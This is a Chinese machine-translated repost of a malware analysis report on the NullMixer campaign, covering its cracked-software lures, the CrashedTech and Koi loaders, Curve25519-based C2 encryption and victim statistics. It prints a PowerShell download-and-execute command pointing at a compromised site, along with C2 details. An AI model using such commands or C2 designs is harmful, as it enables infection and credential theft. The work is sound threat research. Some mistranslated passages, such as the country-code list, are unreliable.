来自MaaS的更新:通过NullMixer传递的新威胁
对NullMixer恶意软件操作的技术分析表明,从攻击者的角度来看,意大利和法国是最喜欢的欧洲国家。
执行摘要
- 我们对最近的NullMixer恶意软件操作的观察表明,从机会主义攻击者的角度来看,意大利和法国是最喜欢的欧洲国家。
- 在三十天内,我们监控的操作能够建立对8000多个端点的初始访问并窃取敏感数据,这些数据现在正在进入地下黑市。
- 大多数受害者安装了Windows 10专业版和企业版操作系统,包括Windows Server的多个数据中心版本。其中一些也是Windows Embedded,表明此类恶意软件操作甚至渗透到IoT环境中。
- NullMixer包包括地下市场中第三方MaaS和PPI服务提供商的新多态加载器,以及一些有争议的、可能与朝鲜相关的 PseudoManuscript代码。
介绍
2023年3月,我们获得了有关持续恶意软件操作的信息和数据,该操作在几周内攻击了8000多个目标,尤其是北美、意大利和法国的目标。
这与称为NullMixer的全球恶意软件操作有关,这是一种基于SEO中毒和社会工程技术的有争议且广泛的恶意软件交付策略,以吸引精通技术的用户,包括 IT 人员。
从这次攻击浪潮的观察揭示了交付的有效载荷中存在一段有争议的代码,以及与新MaaS和PPI运营商相关的其他加载程序。
技术分析
我们在本次调查中对两个主要关键领域进行了技术分析:首先,存在两个进入MaaS和PPI业务的未知加载器(CrashedLoader和 Koi),以及存在争议的、可能与朝鲜相关的恶意软件,其次,我们分析了有关目标主机上当前成功感染率的数据。
发起恶意广告活动
根据CTI对对手基础设施的调查,我们能够确定正在进行的活动,引诱系统管理员将恶意代码安装到他们的机器中。特别是,已识别的攻击波旨在诱骗用户安装臭名昭著的PC维护软件的后门破解版本,例如“EaseUS Partition Master”和“Driver Easy Pro”这两个IT社区中的知名工具。
文件名:Driver Easy Pro Crack.exeMD5:324db70fad161852fb9a12b202b6c8ad
调查最终出现在一系列宣传此类程序破解的Youtube视频中。其中一个展示了一个蒙面、戴兜帽的男性黑客,解释了如何使用视频描述中链接的破解。威胁行为者滥用Bitly shorterer和一个临时的BlogSpot帐户来保护恶意代码,最终存储在 Mega.nz上托管的加密zip存档中。
这种特殊的作案手法与卡巴斯基研究人员在2022年9月发现的一种特殊威胁相匹配:NullMixer。NullMixer 是一种遍布全球的犯罪活动,旨在为大量犯罪威胁行为者提供感染服务。事实上,它的运营商将大量恶意软件打包到一个向量中,然后滥用社会工程、SEO中毒和恶意广告技术来引诱受害者运行他们的有效负载。
自2022年9月以来,NullMixer一直保持着相同的诱饵主题,针对精通技术的用户甚至潜在的IT人员和自由职业者宣传假冒软件盗版破解。
在2023年3月的感染浪潮中,他们制作了上述YouTube视频,其中包含下载和运行后门盗版软件的说明,从而改进了他们的社会工程技术。
尽管发生了这种演变,但NullMixer的初始负载基本保持不变:一个WinRAR可执行文件,其中包含多个配置为在单击时自动启动的二进制文件。所有在同一时间。
与不同威胁行为者相关的大量恶意代码让我们有机会更好地了解地下网络犯罪分子的演变。事实上,除了众所周知的现成信息窃取程序之外,我们还观察到更多特殊代码片段的存在,包括其他非常规的恶意软件加载程序服务。
- Crack.exe,可能是一个“PseudoManuscrypt”加载程序,一种自2021年6月以来已知的特殊威胁,目前,对这段代码的Lazarus(APT38)作者的推测确实没有足够的信心受益。
- Brg.exe,一种常见的RacconStealer,其命令和控制服务器由俄罗斯云提供商VDSina托管。
- Lower.exe是“GCleaner”间谍软件的样本,从历史上看,该恶意软件最初是伪造CCleaner以投放其他恶意软件。
- Sqlcmd.exe,一个有趣的信息窃取器和释放器,利用自定义ECC密码术来保护其通信。
- KiffAppE2.exe,Crashtech Loader,一种自2022年11月开始运行的新加载程序服务,恶意软件的详细信息在以下小节中。
- ss29.exe是一个特定的植入程序,它加载了从jpeg图像中检索到的Fabookie钱包窃取程序,它还利用谷歌云端点来提供恶意PAC文件,以使用外部HTTP代理(T1090.002)配置拦截
以下小节将重点介绍上述一些示例,尤其是加载程序示例,旨在更好地了解当前的MaaS格局。
崩溃的技术装载机
“KiffAppE2.exe”文件值得一提,因为它用作辅助加载程序,该加载器于2022年11月出现在安全社区中,该加载器将其命名为“CrashedTech Loader”。
文件名:KiffAppE2.exe哈希值:53f9c2f2f1a755fc04130fd5e9fcaff4
“KiffAppE2.exe”文件是一个.NET二进制文件,它隐藏了显而易见的加载程序代码,基本上,它在显示应用程序表单之前启动加载程序代码。它还会检查HKCU hive下的特定注册表项“KiffAppApi”,以确保受害者尚未被感染,因此这可能会伤害伪装的PPI模型。
加载程序代码非常简单,其主要逻辑包括两个步骤。首先,它会向C2上的“/addnew.php”端点提供用户名、操作系统版本和公共IP信息,然后解析服务器响应以提取下载更多有效载荷的位置。在此之后,它会下载有效负载并通过“Process.Start”.NET API执行它。
2023年3月期间,这个特定的加载程序投放了至少两个不同的RedLine Stealer有效载荷,这些有效载荷被配置为连接回由乌克兰托管服务提供商Timehost托管的C2服务器。
“锦鲤”窃取者/装载者
我们称为ATK-16的NullMixer活动中嵌入的另一个有趣的恶意软件是“sqlcmd.exe”二进制文件,一个32位MSVC二进制文件。
文件名:sqlcmd.exe哈希:6ffbbca108cfe838ca7138e381df210d
在高层次上,这个加载器的主要例程做了两件事:坚持尝试从静态配置的位置下载名称模式为“ab[NUMBER].php”和“ab[NUMBER].exe”的多个可执行文件,以及运行额外的内联PowerShell命令来下载和执行更多代码。
“C:\WINDOWS\sysnative\cmd.exe” /c “powershell -command IEX(New-Object Net.Webclient).DownloadString(‘https://neutropharma.com/wp/wp-content/debug2.ps1’) ”
这个加载程序的特定示例从巴基斯坦的一个受感染的WordPress站点下载PowerShell脚本。我们观察到下载的典型名称是“debug2.ps1”、“debug20.ps1”、“debug4.ps1”等。下载的脚本包含一大块字节和一种基于类似教科书的异或运算的解密例程,之后,生成的字节作为.NET程序集模块加载。
解密嵌入式代码的密钥通过外部签入服务提供,实施多阶段多态保护方案。这种初始C2服务还提供额外的恶意软件配置,包括活动ID和额外的命令和控制位置。
在2023年3月期间,生成的二进制文件是一个包含ConfuseEx v1.0.0的.NET文件。解码后,恶意负载会产生一个名为“koi”的.NET模块,并实现信息窃取功能,例如从FileZilla、Chrome浏览器和Discord窃取密码、窃取加密钱包、Telegram文件夹渗漏、Vpn配置,它还看起来对于像Trezor这样的硬件钱包的存在,可能是为了识别加密货币盗窃的高价值目标。该模块还从Twilio的Authy本地存储中泄露二次身份认证密钥。
文件名:“Koi”(转储)哈希:9725ec075e92e25ea5b6e99c35c7aa74
在开始所有这些收集操作之前,“koi”模块调用“checkVal”函数来避免不需要的目标。特别是,它使用互斥量“99759703-b8b4–4cb2–8329–76f908b004f0”来避免再次感染,并检查是否存在Wine仿真框架的视频控制器,以及沙箱或反病毒沙箱进程。
如果系统语言设置为代表独联体国家的值之一,该模块还可以避免执行恶意窃取例程:
- AZ:阿塞拜疆
- 上午:亚美尼亚
- 作者:白俄罗斯
- KZ:哈萨克斯坦
- KG:吉尔吉斯斯坦
- MD:摩尔多瓦
- RU:俄罗斯
- TJ:塔吉克斯坦
- 商标:土库曼斯坦
- UZ:乌兹别克斯坦
之后,“koi”模块开始收集有关系统安装软件的信息,并使用接收到的命令和控制服务作为启动参数建立通信通道,在本例中为拉脱维亚IP地址195.123.211,56。
这种恶意软件以一种奇怪的方式与其命令和控制进行通信:它将某些内存流直接重定向到远程服务器,这样,恶意软件作者就能够避免接触磁盘,甚至在渗出之前放置临时数据。发送到C2的第一条消息以“CONFIG|”开头 关键字并包含签入信息以及通过其PowerShell加载程序传递给模块的活动ID。然后,C2对受感染的主机进行分类并以两种可能的方式做出响应:如果返回“D”,则“koi”模块停止运行,否则,该命令将包含其他命令,恶意代码开始从受感染的主机收集更多数据主持人。
详细来说,来自C2服务器的有效响应如下所示:
LDR“|” (做|与|或)“|” (开|关)“|” (列表“,”列表“,” ..)“|” 网址“|” 后缀
在这里,C2服务器要求机器人从指定为“url”的远程位置下载并执行额外的有效载荷。
所有这些通信都发生在纯HTTP中,但尽管如此,消息并不容易被发现,因为“koi”模块使用基于ECC加密的自定义协议对消息进行加密。
事实上,C2通信利用Curve25519的自定义实现ECC来生成一个共享密钥,该密钥将用于加密其他普通的HTTP主体。具体而言,该恶意软件的通信保护方案如下:
- 服务器“peer-key”被硬编码到打包的 .NET模块的Main函数中。
- 机器人“公钥”和“私钥”是在进程启动时随机生成的。
- 共享秘密是从机器人的“私钥”和服务器的“对等密钥”开始计算的。
- 共享密钥用于使用基于异或的算法以先压缩后加密的方式加密GZipped内存流。
为了使这一切正常进行,发送到C2服务器的最终消息还需要包含机器人“公钥”,此时出现了一个检测机会:生成请求的HTTP正文连接了随机生成的机器人的 32 个字节“public-key”,静态分隔符“K”,然后是加密流。
攻击浪潮洞察
基于对NullMixer wave(ATK-16)中涉及的C2基础设施的分析,我们获得了有关成功感染主机的见解。特别是,我们能够获得目标机器中至少一个有效载荷成功执行的证据。
我们剖析的NullMixer操作(ATK-16)统计了至少87个国家/地区的受害者。以平均每天297名新受害者的违规率,背后的恶意行为者在不到30天的时间内攻击了8000多人。运营高峰表明,从2023年2月28日开始,感染率明显上升,活动加剧。
受影响的国家
在3月的峰值期间,恶意操作者在北美以外的国家/地区显着扩大了他们的活动:这波浪潮袭击了许多欧洲国家,包括意大利(4.57%,排名第四)和法国(3.38%,排名第六)。
从感染主机的现有数据来看,感染进程显示,攻击面在2月28日出现了明显的水平扩展,对应于上述峰值。
目标配置文件
正如我们预期的那样,大多数目标主机安装了Microsoft客户端操作系统:56.8% Windows 10 Pro和 25.35% Windows 10 Home,表明主要目标是微型或小型企业或私人用户。尽管如此,我们还是注意到了一些有趣的异常值,5.3% 的受害者安装了企业版的微软操作系统,近71台主机还安装了微软操作系统的Windows Server版本。
从受害者身上提取的大部分数据可能很快就会进入地下黑市,但对于受感染主机的最新部分来说,风险甚至更高:运营商可能会试图将对这些服务器和企业机器的访问权出售给更危险的人第三方,包括知名的勒索软件运营商。
最后,我们还注意到有五台被感染的机器运行的是更罕见的微软操作系统版本:Windows Embedded,这表明即使是基于Windows的物联网设备也受到了这次活动的打击。
结论
9 个月后,NullMixer操作利用恶意视频教程进行了演变,增加了其对精通技术的用户的渗透,并在MaaS生态系统中揭示了新的潜在参与者。
我们在此次调查期间访问的数据揭示了他们最近一次活动中受影响的受害者,表明意大利是2023年3月感染浪潮袭击的第一个欧洲目标。最近一段时间,意大利成为网络攻击的主要目标,尤其是来自支持克里姆林宫宣传的年轻网络游击队团体,例如Killnet和NoName057。此类犯罪分子的行动基于通常位于独联体东部国家的志愿者和微型犯罪劳动力,因此,观察这种针对意大利主机的渗透的峰值变得特别有趣,尤其是在当前针对意大利半岛的地缘政治和网络温度的情况下。
受害者的技术细节、对手的基础设施和妥协指标已与地方当局和国家CSIRT共享。
如果您想了解针对此威胁的妥协指标和Yara规则,请查看发表在Medium上的原始帖子:
关于作者:Luca Mella,网络安全专家
2019 年,Luca被评为“32 位有影响力的恶意软件研究专家”之一。他是ANeSeC CTF团队的前成员,该团队是2011年诞生的首批意大利网络兵棋推演团队之一。
本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/5441.html
